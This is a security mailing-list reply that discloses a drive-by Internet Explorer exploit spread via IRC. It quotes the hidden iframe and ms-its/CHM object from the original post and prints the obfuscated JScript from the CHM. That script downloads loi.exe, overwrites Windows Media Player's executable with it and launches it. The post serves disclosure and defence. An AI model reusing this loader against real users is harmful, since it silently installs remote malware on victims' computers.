[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-Disclosure] IE exploit going around on irc

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

source of the jscript inside the chm

have a nice day

<SCRIPT LANGUAGE="javascript">

~    function getPath(url) {
~        start = url.indexOf('http:')
~        end = url.indexOf('LOI.CHM')
~        return url.substring(start, end);
~    }

~    tehaa = 'ADO' + 'DB' + '.St' + 'ream';
~    tehao = 'Micro' + 'soft.XM' + 'LHTTP';
~    tehex = '.exe';
~    tehwmp = 'C:\\Pr' + 'ogram Files\\Win' + 'dows Media Player\\wmpl'
+ 'ayer' + tehex;
~    tehmms = 'm' + 'm' + 's' + ':/' + '/';

~    var tehf = new ActiveXObject(tehaa);
~    tehf.Mode = 3;
~    tehf.Type = 1;

~ tehgURLf = getPath(location.href)+'loi' + tehex;

~    var tehg = new ActiveXObject(tehao);
~    tehg.Open("GET",tehgURLf,0);
~    tehg.Send();

~    tehf.Open();
~    tehf.Write(tehg.responseBody);

~    tehf.SaveToFile(tehwmp,2);
~    location.href = tehmms;

</SCRIPT>

Francois Harvey
SecuriWeb inc.

Niek Baakman a écrit :

| Hi list,
|
| this thing's been going around on irc the last few days:
|
| www.divx.dc-hub.com (IE users don't click it!) check source:
| <iframe src='loi.htm' width=0 height=0></iframe>
|
| loi.htm contains: <object
| data="ms-its:mhtml:file://C:\winhelp.mht!${PATH}/LOI.CHM::/loi.htm"
|  type="text/x-scriptlet"></object>
|
|
| LOI.CHM is attached
|
| Regards,
|
| Niek Baakman
|

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (MingW32)

iD8DBQFAca0ebw9u6+cJxl4RAphzAJ9TRgSBuaPatVFbXBfzqBoKmbrHCACeJ/X8
FZvzRZU2LDEPQyJ0lVMXWiQ=
=Bvkg
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html